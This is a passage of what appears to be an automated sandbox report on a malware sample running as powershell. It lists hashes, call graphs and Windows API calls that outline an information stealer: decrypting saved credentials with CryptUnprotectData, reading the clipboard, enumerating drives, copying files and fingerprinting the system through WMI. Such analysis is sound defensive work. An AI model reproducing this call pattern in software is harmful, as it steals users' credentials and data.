                                                                                                              • Instruction Fuzzy Hash: 893154B1D056188BEB68CF6BCD5578EFAF7BFC9304F14C1A9C408A6265EB740A858F41
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3509483100.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_74b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 816fdb0827e2d74d708ac0b24b40d02bfe2dfa10ac0ea2ec57509ee3eae217f7
                                                                                                              • Instruction ID: 248d7b04d861ff28e87bbf48e50e83dec4274e198e492b18b6556c1e24344354
                                                                                                              • Opcode Fuzzy Hash: 816fdb0827e2d74d708ac0b24b40d02bfe2dfa10ac0ea2ec57509ee3eae217f7
                                                                                                              • Instruction Fuzzy Hash: 6621D5B1E056189BEB28CF9BD9407DDBAF7BFC9300F14C16AD409AA254DB74094A8F50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3509483100.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_74b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 145ce7776ffa06e7e2f176047827da8c81b9c96717d1c15b16a3420da9e4b133
                                                                                                              • Instruction ID: f0af596f4c30682765345b8e09790e2b8a8a5e4832aa0efcfe45b20f046a54d4
                                                                                                              • Opcode Fuzzy Hash: 145ce7776ffa06e7e2f176047827da8c81b9c96717d1c15b16a3420da9e4b133
                                                                                                              • Instruction Fuzzy Hash: 0021E8B1E056189BEB18CF9BD8447DEFAF7BFC9300F14C16AD408AA254DB74094A8F50

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:9.1%
                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                              Signature Coverage:20.1%
                                                                                                              Total number of Nodes:422
                                                                                                              Total number of Limit Nodes:26
                                                                                                              execution_graph 13655 43c583 13656 43c5a0 13655->13656 13658 43c5ee 13656->13658 13662 43c160 LdrInitializeThunk 13656->13662 13659 43c68e 13658->13659 13661 43c160 LdrInitializeThunk 13658->13661 13661->13659 13662->13658 14063 430fa3 CoSetProxyBlanket 13663 41a043 13664 41a42d 13663->13664 13666 419efc 13663->13666 13669 41a261 13663->13669 13666->13663 13666->13664 13666->13669 13670 43fad0 13666->13670 13676 43c160 LdrInitializeThunk 13666->13676 13668 41a403 CryptUnprotectData 13668->13664 13669->13668 13672 43faf0 13670->13672 13671 43fc7e 13671->13666 13674 43fb8e 13672->13674 13677 43c160 LdrInitializeThunk 13672->13677 13674->13671 13678 43c160 LdrInitializeThunk 13674->13678 13676->13666 13677->13674 13678->13671 13679 4189c3 13680 4189c8 13679->13680 13690 43ac40 13680->13690 13682 4189e3 13683 418ba2 13682->13683 13688 418c4b 13682->13688 13698 41d4e0 13683->13698 13685 418e9d 13686 41d4e0 2 API calls 13685->13686 13687 418c3a 13686->13687 13688->13685 13688->13687 13694 43f7c0 13688->13694 13691 43ac9e 13690->13691 13692 43ac4a 13690->13692 13691->13682 13692->13691 13721 43c160 LdrInitializeThunk 13692->13721 13696 43f7e0 13694->13696 13695 43f96e 13695->13688 13696->13695 13722 43c160 LdrInitializeThunk 13696->13722 13699 41d565 13698->13699 13700 41d50f 13698->13700 13701 41d88c 13698->13701 13699->13687 13700->13699 13700->13701 13723 414a00 13700->13723 13701->13701 13703 414a00 2 API calls 13701->13703 13705 41d90d 13703->13705 13704 41d66d 13706 414a00 2 API calls 13704->13706 13707 414a00 2 API calls 13705->13707 13708 41d6f7 13706->13708 13709 41d9b0 13707->13709 13711 414a00 2 API calls 13708->13711 13710 414a00 2 API calls 13709->13710 13712 41da48 13710->13712 13713 41d781 13711->13713 13715 414a00 2 API calls 13712->13715 13714 414a00 2 API calls 13713->13714 13716 41d832 13714->13716 13717 41db13 13715->13717 13718 414a00 2 API calls 13716->13718 13719 414a00 2 API calls 13717->13719 13718->13701 13720 41db7c 13719->13720 13721->13691 13722->13695 13724 414a20 13723->13724 13724->13724 13757 43f5e0 13724->13757 13726 414b4d 13727 43f5e0 LdrInitializeThunk 13726->13727 13738 414ded 13727->13738 13728 415013 13728->13704 13729 414f55 13763 43a8d0 13729->13763 13732 414e6e 13732->13732 13762 43c160 LdrInitializeThunk 13732->13762 13733 414f5b 13734 414fb3 13733->13734 13808 43c160 LdrInitializeThunk 13733->13808 13735 41548f 13734->13735 13736 415478 13734->13736 13737 41544c 13734->13737 13743 4154b2 13734->13743 13747 41549d 13734->13747 13755 415593 13734->13755 13784 43a920 13734->13784 13740 43ac40 LdrInitializeThunk 13735->13740 13739 43f5e0 LdrInitializeThunk 13736->13739 13737->13735 13737->13736 13737->13743 13737->13747 13737->13755 13796 43acd0 13737->13796 13738->13728 13738->13729 13738->13732 13753 414f34 13738->13753 13761 43c160 LdrInitializeThunk 13738->13761 13739->13735 13740->13747 13741 43c160 LdrInitializeThunk 13741->13753 13743->13747 13752 43fad0 LdrInitializeThunk 13743->13752 13743->13755 13804 43f9c0 13743->13804 13747->13704 13752->13743 13753->13728 13753->13729 13753->13733 13753->13741 13767 4385a0 13753->13767 13809 43c160 LdrInitializeThunk 13755->13809 13759 43f5f0 13757->13759 13758 43f76e 13758->13726 13759->13758 13810 43c160 LdrInitializeThunk 13759->13810 13761->13732 13762->13753 13764 43a911 13763->13764 13765 43a8e3 13763->13765 13764->13733 13766 43a8ff RtlFreeHeap 13765->13766 13766->13764 13769 4385b0 13767->13769 13773 4386f5 13769->13773 13811 43c0e0 13769->13811 13815 43c160 LdrInitializeThunk 13769->13815 13771 438a8d 13772 43a8d0 RtlFreeHeap 13771->13772 13774 438aa6 13772->13774 13773->13771 13775 43ab30 LdrInitializeThunk 13773->13775 13774->13753 13781 438738 13775->13781 13776 438a91 13777 43ac40 LdrInitializeThunk 13776->13777 13777->13771 13778 43c0e0 RtlFreeHeap 13778->13781 13779 43c160 LdrInitializeThunk 13779->13781 13780 43a8d0 RtlFreeHeap 13780->13781 13781->13776 13781->13778 13781->13779 13781->13780 13782 438ab3 13781->13782 13783 43a8d0 RtlFreeHeap 13782->13783 13783->13776 13785 43a940 13784->13785 13788 43a97e 13785->13788 13816 43c160 LdrInitializeThunk 13785->13816 13786 415440 13792 43ab30 13786->13792 13788->13786 13791 43aa2e 13788->13791 13817 43c160 LdrInitializeThunk 13788->13817 13789 43a8d0 RtlFreeHeap 13789->13786 13791->13789 13793 43ab41 13792->13793 13794 43abde 13792->13794 13793->13794 13818 43c160 LdrInitializeThunk 13793->13818 13794->13737 13797 41546a 13796->13797 13798 43ace2 13796->13798 13797->13735 13797->13736 13797->13743 13797->13747 13797->13755 13798->13797 13800 43ad3e 13798->13800 13819 43c160 LdrInitializeThunk 13798->13819 13801 43ae1e 13800->13801 13820 43c160 LdrInitializeThunk 13800->13820 13801->13797 13821 43c160 LdrInitializeThunk 13801->13821 13806 43f9e0 13804->13806 13805 43fa7e 13805->13743 13806->13805 13822 43c160 LdrInitializeThunk 13806->13822 13808->13734 13809->13747 13810->13758 13812 43c0f8 13811->13812 13814 43c106 13811->13814 13813 43a8d0 RtlFreeHeap 13812->13813 13812->13814 13813->13814 13814->13769 13815->13769 13816->13788 13817->13791 13818->13794 13819->13800 13820->13801 13821->13797 13822->13805 14064 43cc21 14065 43cc2b 14064->14065 14066 43ccfe 14065->14066 14070 43c160 LdrInitializeThunk 14065->14070 14069 43c160 LdrInitializeThunk 14066->14069 14069->14066 14070->14066 14071 421de0 14072 421dee 14071->14072 14076 421e45 14071->14076 14077 421f00 14072->14077 14078 421f10 14077->14078 14078->14078 14079 43f7c0 LdrInitializeThunk 14078->14079 14080 42200f 14079->14080 14081 43a920 14082 43a940 14081->14082 14085 43a97e 14082->14085 14089 43c160 LdrInitializeThunk 14082->14089 14083 43ab01 14085->14083 14088 43aa2e 14085->14088 14090 43c160 LdrInitializeThunk 14085->14090 14086 43a8d0 RtlFreeHeap 14086->14083 14088->14086 14089->14085 14090->14088 14091 40eba3 CoInitializeSecurity CoInitializeSecurity 14092 43c367 14093 43c380 14092->14093 14093->14093 14096 43c3ce 14093->14096 14099 43c160 LdrInitializeThunk 14093->14099 14094 43c44e 14096->14094 14098 43c160 LdrInitializeThunk 14096->14098 14098->14094 14099->14096 14100 410d64 14103 410d81 14100->14103 14102 40f364 14103->14102 14104 415630 14103->14104 14105 415650 14104->14105 14105->14105 14106 43f5e0 LdrInitializeThunk 14105->14106 14107 415781 14106->14107 14108 4157cd 14107->14108 14109 43f9c0 LdrInitializeThunk 14107->14109 14111 4157fb 14107->14111 14115 41580a 14107->14115 14110 43fad0 LdrInitializeThunk 14108->14110 14108->14111 14108->14115 14109->14108 14110->14111 14112 415bfe 14111->14112 14111->14115 14117 43c160 LdrInitializeThunk 14111->14117 14118 43c160 LdrInitializeThunk 14112->14118 14115->14102 14115->14115 14116 415d2d 14117->14112 14118->14116 13824 40d0c6 13825 40d0cc 13824->13825 13826 40d0db CoUninitialize 13825->13826 13827 40d100 13826->13827 13827->13827 14119 435c65 14122 435c83 14119->14122 14120 435cf1 14122->14120 14123 43c160 LdrInitializeThunk 14122->14123 14123->14122 13828 40cecb 13829 40cedb 13828->13829 13858 424010 13829->13858 13831 40cee1 13868 424750 13831->13868 13833 40cf01 13872 424a00 13833->13872 13835 40cf21 13882 427950 13835->13882 13839 40cf53 13902 4299c0 13839->13902 13841 40cf7c 13906 432be0 OpenClipboard 13841->13906 13843 40cfa5 13844 424010 3 API calls 13843->13844 13845 40cfc6 13844->13845 13846 424750 2 API calls 13845->13846 13847 40cfe6 13846->13847 13848 424a00 2 API calls 13847->13848 13849 40d006 13848->13849 13850 427950 2 API calls 13849->13850 13851 40d02f 13850->13851 13852 427cd0 4 API calls 13851->13852 13853 40d038 13852->13853 13854 4299c0 LdrInitializeThunk 13853->13854 13855 40d061 13854->13855 13856 432be0 6 API calls 13855->13856 13857 40d08a 13856->13857 13864 424070 13858->13864 13859 4244af 13915 4223a0 13859->13915 13860 4242c6 13863 424431 GetLogicalDrives 13860->13863 13862 4241a0 13862->13831 13862->13862 13865 43f7c0 LdrInitializeThunk 13863->13865 13864->13859 13864->13860 13864->13862 13864->13864 13866 43f7c0 LdrInitializeThunk 13864->13866 13865->13862 13867 4242a1 13866->13867 13867->13859 13867->13860 13867->13862 13869 424800 13868->13869 13869->13869 13870 4249d5 13869->13870 13930 420540 13869->13930 13870->13833 13873 424a0e 13872->13873 13934 43e370 13873->13934 13875 424aa7 13877 424b61 13875->13877 13881 4249e0 13875->13881 13938 43e870 13875->13938 13946 43e4e0 13877->13946 13880 43e370 LdrInitializeThunk 13880->13881 13881->13835 13881->13881 13883 427980 13882->13883 13886 4279de 13883->13886 13959 43c160 LdrInitializeThunk 13883->13959 13884 40cf4a 13890 427cd0 13884->13890 13886->13884 13889 427afe 13886->13889 13960 43c160 LdrInitializeThunk 13886->13960 13887 43a8d0 RtlFreeHeap 13887->13884 13889->13887 13889->13889 13961 427cf0 13890->13961 13892 427ce4 13892->13839 13893 427cd9 13893->13892 13981 438ad0 13893->13981 13895 43f5e0 LdrInitializeThunk 13901 428540 13895->13901 13896 43f9c0 LdrInitializeThunk 13896->13901 13897 42878c CopyFileW 13897->13901 13898 42856b 13898->13839 13899 43fad0 LdrInitializeThunk 13899->13901 13901->13895 13901->13896 13901->13897 13901->13898 13901->13899 13988 43c160 LdrInitializeThunk 13901->13988 13904 429a00 13902->13904 13903 429b28 13903->13841 13904->13903 13904->13904 13905 43f5e0 LdrInitializeThunk 13904->13905 13905->13904 13907 432c04 GetClipboardData 13906->13907 13908 432d2d 13906->13908 13909 432c21 GlobalLock 13907->13909 13910 432d27 CloseClipboard 13907->13910 13908->13843 13912 432c37 13909->13912 13910->13908 13911 432d1b GlobalUnlock 13911->13910 13912->13911 13913 432c65 GetWindowLongW 13912->13913 13914 432ccf 13913->13914 13914->13911 13916 43f5e0 LdrInitializeThunk 13915->13916 13918 4223e0 13916->13918 13917 422b18 13917->13862 13918->13917 13925 4224c3 13918->13925 13927 43c160 LdrInitializeThunk 13918->13927 13920 422a83 13921 43a8d0 RtlFreeHeap 13920->13921 13922 422a95 13921->13922 13922->13917 13929 43c160 LdrInitializeThunk 13922->13929 13925->13920 13926 43a8d0 RtlFreeHeap 13925->13926 13928 43c160 LdrInitializeThunk 13925->13928 13926->13925 13927->13918 13928->13925 13929->13922 13931 420570 13930->13931 13931->13931 13932 4223a0 2 API calls 13931->13932 13933 4205bf 13932->13933 13933->13870 13936 43e390 13934->13936 13935 43e4ae 13935->13875 13936->13935 13954 43c160 LdrInitializeThunk 13936->13954 13939 43e890 13938->13939 13942 43e92e 13939->13942 13955 43c160 LdrInitializeThunk 13939->13955 13940 43ec08 13940->13875 13942->13940 13945 43ea5e 13942->13945 13956 43c160 LdrInitializeThunk 13942->13956 13943 43a8d0 RtlFreeHeap 13943->13940 13945->13943 13947 43e500 13946->13947 13950 43e59e 13947->13950 13957 43c160 LdrInitializeThunk 13947->13957 13948 424b96 13948->13880 13948->13881 13950->13948 13953 43e6fe 13950->13953 13958 43c160 LdrInitializeThunk 13950->13958 13951 43a8d0 RtlFreeHeap 13951->13948 13953->13951 13953->13953 13954->13935 13955->13942 13956->13945 13957->13950 13958->13953 13959->13886 13960->13889 13962 427d30 13961->13962 13962->13962 13963 43a920 2 API calls 13962->13963 13964 427d8a 13963->13964 13965 43ab30 LdrInitializeThunk 13964->13965 13966 427d96 13965->13966 13978 427e49 13966->13978 13989 43af80 13966->13989 13968 428239 13968->13893 13969 428323 13972 43ac40 LdrInitializeThunk 13969->13972 13970 42831a 13971 43ac40 LdrInitializeThunk 13970->13971 13971->13969 13980 42832c 13972->13980 13974 43f5e0 LdrInitializeThunk 13974->13980 13975 43f9c0 LdrInitializeThunk 13975->13980 13976 42878c CopyFileW 13976->13980 13977 43fad0 LdrInitializeThunk 13977->13980 13978->13968 13978->13969 13978->13970 13978->13980 13997 43aee0 13978->13997 13980->13968 13980->13974 13980->13975 13980->13976 13980->13977 13980->13980 14001 43c160 LdrInitializeThunk 13980->14001 13986 438b00 13981->13986 13982 43e370 LdrInitializeThunk 13982->13986 13983 43e870 2 API calls 13983->13986 13984 438c68 13984->13901 13986->13982 13986->13983 13986->13984 14005 43eff0 13986->14005 14013 43c160 LdrInitializeThunk 13986->14013 13988->13901 13990 43afd0 13989->13990 13996 43b00e 13990->13996 14002 43c160 LdrInitializeThunk 13990->14002 13991 43b778 13991->13978 13993 43b721 13993->13991 14003 43c160 LdrInitializeThunk 13993->14003 13995 43c160 LdrInitializeThunk 13995->13996 13996->13991 13996->13993 13996->13995 13999 43af00 13997->13999 13998 43af4e 13998->13978 13999->13998 14004 43c160 LdrInitializeThunk 13999->14004 14001->13980 14002->13996 14003->13991 14004->13998 14006 43f001 14005->14006 14010 43f17e 14006->14010 14014 43c160 LdrInitializeThunk 14006->14014 14007 43f3cb 14007->13986 14009 43a8d0 RtlFreeHeap 14009->14007 14010->14007 14011 43f30e 14010->14011 14015 43c160 LdrInitializeThunk 14010->14015 14011->14009 14013->13986 14014->14010 14015->14011 14124 40d7ec 14125 40d850 14124->14125 14128 40d8ae 14125->14128 14131 43c160 LdrInitializeThunk 14125->14131 14126 40d9ae 14128->14126 14130 43c160 LdrInitializeThunk 14128->14130 14130->14126 14131->14128 14132 40e5ad 14133 40e5d0 14132->14133 14137 437b10 14133->14137 14135 437b10 12 API calls 14136 40e712 14135->14136 14136->14135 14138 437b40 CoCreateInstance 14137->14138 14140 438140 14138->14140 14141 437d95 SysAllocString 14138->14141 14142 438150 GetVolumeInformationW 14140->14142 14144 437e1d 14141->14144 14152 438172 14142->14152 14145 437e25 CoSetProxyBlanket 14144->14145 14146 43812f SysFreeString 14144->14146 14147 438125 14145->14147 14148 437e45 SysAllocString 14145->14148 14146->14140 14147->14146 14150 437f00 14148->14150 14150->14150 14151 437f16 SysAllocString 14150->14151 14154 437f3a 14151->14154 14152->14136 14153 438113 SysFreeString SysFreeString 14153->14147 14154->14153 14155 438109 SysFreeString 14154->14155 14156 437f7e VariantInit 14154->14156 14155->14153 14159 437fd0 14156->14159 14157 4380f4 VariantClear 14158 438105 14157->14158 14158->14155 14159->14157 14016 42e2cd 14018 42e300 14016->14018 14017 42e43e 14018->14017 14020 43c160 LdrInitializeThunk 14018->14020 14020->14017 14021 408710 14023 40871f 14021->14023 14022 40890c ExitProcess 14023->14022 14024 4087ac GetCurrentProcessId GetCurrentThreadId 14023->14024 14025 4088f0 14023->14025 14026 4087d1 14024->14026 14027 4087d5 SHGetSpecialFolderPathW GetForegroundWindow 14024->14027 14025->14022 14026->14027 14028 408888 14027->14028 14028->14025 14030 40c5e0 CoInitializeEx 14028->14030 14160 42d0f3 14161 42d0fe 14160->14161 14165 437740 14161->14165 14163 42d10c 14164 437740 LdrInitializeThunk 14163->14164 14164->14163 14166 43774e 14165->14166 14168 437842 14166->14168 14174 43c160 LdrInitializeThunk 14166->14174 14170 4378c4 14168->14170 14171 43795c 14168->14171 14173 43c160 LdrInitializeThunk 14168->14173 14170->14163 14171->14170 14175 43c160 LdrInitializeThunk 14171->14175 14173->14168 14174->14166 14175->14171 14031 40d619 14034 412540 14031->14034 14033 40d61f 14041 41255a 14034->14041 14035 412561 14035->14033 14038 43c160 LdrInitializeThunk 14038->14041 14040 43a8d0 RtlFreeHeap 14040->14041 14041->14035 14041->14038 14041->14040 14042 40ac10 14041->14042 14046 43f3e0 14041->14046 14050 43fcd0 14041->14050 14043 40aca0 14042->14043 14043->14043 14044 40acdd 14043->14044 14045 43c0e0 RtlFreeHeap 14043->14045 14044->14041 14045->14043 14048 43f3f0 14046->14048 14047 43f578 14047->14041 14048->14047 14056 43c160 LdrInitializeThunk 14048->14056 14052 43fcf0 14050->14052 14051 43fe7e 14051->14041 14054 43fd8e 14052->14054 14057 43c160 LdrInitializeThunk 14052->14057 14054->14051 14058 43c160 LdrInitializeThunk 14054->14058 14056->14047 14057->14054 14058->14051 14176 436db9 14177 436dd1 14176->14177 14178 436de8 GetUserDefaultUILanguage 14177->14178 14179 436e0e 14178->14179 14184 43c2fe 14185 43c307 GetForegroundWindow 14184->14185 14186 43c31a 14185->14186 14059 42f61d 14060 42f64b SysAllocString 14059->14060 14062 42f8a3 14060->14062

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 440 437b10-437b35 441 437b40-437b63 440->441 441->441 442 437b65-437b7a 441->442 443 437b80-437ba8 442->443 443->443 444 437baa-437bef 443->444 445 437bf0-437c49 444->445 445->445 446 437c4b-437c6a 445->446 448 437cd9-437ce4 446->448 449 437c6c-437c7f 446->449 451 437cf0-437d30 448->451 450 437c80-437ccd 449->450 450->450 452 437ccf-437cd4 450->452 451->451 453 437d32-437d8f CoCreateInstance 451->453 452->448 454 438140-438170 call 43ddb0 GetVolumeInformationW 453->454 455 437d95-437dcf 453->455 460 438172-438176 454->460 461 43817a-43817c 454->461 457 437dd0-437df2 455->457 457->457 459 437df4-437e1f SysAllocString 457->459 466 437e25-437e3f CoSetProxyBlanket 459->466 467 43812f-43813c SysFreeString 459->467 460->461 462 43818d-438194 461->462 464 4381a0-4381b8 462->464 465 438196-43819d 462->465 468 4381c0-4381f2 464->468 465->464 469 438125-43812b 466->469 470 437e45-437e59 466->470 467->454 468->468 472 4381f4-438225 468->472 469->467 471 437e60-437e7e 470->471 471->471 473 437e80-437ef6 SysAllocString 471->473 474 438230-438257 472->474 475 437f00-437f14 473->475 474->474 476 438259-438289 call 41f2a0 474->476 475->475 477 437f16-437f3c SysAllocString 475->477 480 438290-438297 476->480 483 438113-438122 SysFreeString * 2 477->483 484 437f42-437f64 477->484 480->480 482 438299-4382aa 480->482 485 438180-438187 482->485 486 4382b0-4382c3 call 408100 482->486 483->469 491 437f6a-437f6d 484->491 492 438109-438110 SysFreeString 484->492 485->462 488 4382c8-4382cf 485->488 486->485 491->492 493 437f73-437f78 491->493 492->483 493->492 494 437f7e-437fca VariantInit 493->494 495 437fd0-438011 494->495 495->495 496 438013-43802b 495->496 498 438031-438037 496->498 499 4380f4-438105 VariantClear 496->499 498->499 500 43803d-43804b 498->500 499->492 501 43808d 500->501 502 43804d-438052 500->502 505 43808f-4380b7 call 407f70 call 408c50 501->505 504 43806c-438070 502->504 506 438072-43807b 504->506 507 438060 504->507 516 4380b9 505->516 517 4380be-4380ca 505->517 510 438082-438086 506->510 511 43807d-438080 506->511 509 438061-43806a 507->509 509->504 509->505 510->509 513 438088-43808b 510->513 511->509 513->509 516->517 518 4380d1-4380f1 call 407fa0 call 407f80 517->518 519 4380cc 517->519 518->499 519->518
                                                                                                              APIs
                                                                                                              • CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00437D84
                                                                                                              • SysAllocString.OLEAUT32(5C045A0B), ref: 00437DF9
                                                                                                              • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437E37
                                                                                                              • SysAllocString.OLEAUT32(49F947F1), ref: 00437E85
                                                                                                              • SysAllocString.OLEAUT32(18C206D6), ref: 00437F1B
                                                                                                              • VariantInit.OLEAUT32(83828188), ref: 00437F87
                                                                                                              • VariantClear.OLEAUT32(?), ref: 004380F5
                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00438110
                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0043811A
                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00438120
                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00438130
                                                                                                              • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043816C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000016.00000002.3660988330.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_22_2_400000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: String$Free$Alloc$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                              • String ID: 6Z$6Z$;4$?jYl$C$UM$UM$z{|}
                                                                                                              • API String ID: 1341229144-441414108
                                                                                                              • Opcode ID: a633c24761fe19cdb29494bf90a08ae4ff31b84f00254bba1d2ed369a3c0b899
                                                                                                              • Instruction ID: 32d1f029859c812e3577e43d14a4ed93bc1c567ea28ae8984151c89a2e27ba93
                                                                                                              • Opcode Fuzzy Hash: a633c24761fe19cdb29494bf90a08ae4ff31b84f00254bba1d2ed369a3c0b899
                                                                                                              • Instruction Fuzzy Hash: 77220FB6A083009FD314CF64D881B5BBBE6EFC9304F14892DF58587391EB78D9068B96

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 652 42d4cf-42d52f call 43ddb0 656 42d530-42d596 652->656 656->656 657 42d598-42d5a2 656->657 658 42d5a4-42d5af 657->658 659 42d5bd 657->659 660 42d5b0-42d5b9 658->660 661 42d5c1-42d5ce 659->661 660->660 662 42d5bb 660->662 663 42d5d0-42d5d7 661->663 664 42d5eb-42d654 call 43ddb0 661->664 662->661 665 42d5e0-42d5e9 663->665 670 42d660-42d67a 664->670 665->664 665->665 670->670 671 42d67c-42d686 670->671 672 42d69b-42d6a8 671->672 673 42d688-42d68f 671->673 675 42d6aa-42d6b1 672->675 676 42d6cb-42d726 672->676 674 42d690-42d699 673->674 674->672 674->674 677 42d6c0-42d6c9 675->677 679 42d730-42d74e 676->679 677->676 677->677 679->679 680 42d750-42d75a 679->680 681 42d75c-42d76a 680->681 682 42d77d 680->682 684 42d770-42d779 681->684 683 42d784-42d791 682->683 685 42d793-42d79a 683->685 686 42d7ab-42d7fa 683->686 684->684 687 42d77b 684->687 688 42d7a0-42d7a9 685->688 690 42d800-42d81a 686->690 687->683 688->686 688->688 690->690 691 42d81c-42d826 690->691 692 42d83b-42d848 691->692 693 42d828-42d82f 691->693 695 42d84a-42d851 692->695 696 42d86b-42d8c9 call 43ddb0 692->696 694 42d830-42d839 693->694 694->692 694->694 697 42d860-42d869 695->697 701 42d8d0-42d8f6 696->701 697->696 697->697 701->701 702 42d8f8-42d902 701->702 703 42d904-42d90b 702->703 704 42d91b-42d92d 702->704 705 42d910-42d919 703->705 706 42d933-42d93f 704->706 707 42da6f-42daab 704->707 705->704 705->705 708 42d940-42d94a 706->708 709 42dab0-42daec 707->709 710 42d960-42d966 708->710 711 42d94c-42d951 708->711 709->709 712 42daee-42dafe 709->712 714 42d990-42d99c 710->714 715 42d968-42d96b 710->715 713 42da10-42da16 711->713 716 42db00-42db07 712->716 717 42db1b-42db1e call 431310 712->717 718 42da18-42da1e 713->718 721 42d9a2-42d9a5 714->721 722 42da2a-42da32 714->722 715->714 719 42d96d-42d982 715->719 720 42db10-42db19 716->720 724 42db23-42db43 717->724 718->707 725 42da20-42da22 718->725 719->713 720->717 720->720 721->722 728 42d9ab-42da0f 721->728 726 42da34-42da36 722->726 727 42da38-42da3b 722->727 725->708 729 42da28 725->729 726->718 730 42da6b-42da6d 727->730 731 42da3d-42da69 727->731 728->713 729->707 730->713 731->713
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000016.00000002.3660988330.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_22_2_400000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeLibrary
                                                                                                              • String ID: /g$:!?w$Z!Xt$^$#v
                                                                                                              • API String ID: 3664257935-3698322507
                                                                                                              • Opcode ID: 19a61970159725aceee255d92c9b2e5e9dd3bcb96c21c50fd331cbd9fab3b85b
                                                                                                              • Instruction ID: 4697a7a2b7991663a3431a9e595b2f93c3a4af1ad7168bdcbedf7ab2257885db
                                                                                                              • Opcode Fuzzy Hash: 19a61970159725aceee255d92c9b2e5e9dd3bcb96c21c50fd331cbd9fab3b85b
                                                                                                              • Instruction Fuzzy Hash: 60D10360A0C3E18AD7358F3994507ABBBE1AF97304F58489ED5CD97383C779440ACB66

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 732 408710-408721 call 43bb50 735 408727-40874f call 407f70 732->735 736 40890c-40890e ExitProcess 732->736 739 408750-408773 735->739 740 408794-4087a6 call 434ee0 739->740 741 408775-408792 739->741 744 4088f5-4088fc 740->744 745 4087ac-4087cf GetCurrentProcessId GetCurrentThreadId 740->745 741->739 746 408907 call 43c0c0 744->746 747 4088fe-408904 call 407f80 744->747 748 4087d1-4087d3 745->748 749 4087d5-408886 SHGetSpecialFolderPathW GetForegroundWindow 745->749 746->736 747->746 748->749 752 4088b6-4088e9 call 409a20 749->752 753 408888-4088b4 749->753 752->744 757 4088eb call 40c5e0 752->757 753->752 759 4088f0 call 40b3b0 757->759 759->744
                                                                                                              APIs
                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 004087AC
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 004087B5
                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408869
                                                                                                              • GetForegroundWindow.USER32 ref: 0040887E
                                                                                                                • Part of subcall function 0040C5E0: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C5F3
                                                                                                                • Part of subcall function 0040B3B0: FreeLibrary.KERNEL32(004088F5), ref: 0040B3B6
                                                                                                                • Part of subcall function 0040B3B0: FreeLibrary.KERNEL32 ref: 0040B3D7
                                                                                                              • ExitProcess.KERNEL32 ref: 0040890E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000016.00000002.3660988330.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_22_2_400000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 3072701918-0
                                                                                                              • Opcode ID: 092eeac04e3235b3cffdd63d5fdc64b0968430b27af5ec40e86791fb6eade397
                                                                                                              • Instruction ID: c0d0f8101dccc444c7a8ef3ccfd2f931438813064df6d6c753299e275b31ea86
                                                                                                              • Opcode Fuzzy Hash: 092eeac04e3235b3cffdd63d5fdc64b0968430b27af5ec40e86791fb6eade397
                                                                                                              • Instruction Fuzzy Hash: D0515CB7B003144BD318AF65CD4536676978BC5710F0AC13DAA85AF3D6EE78AC0686C9

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
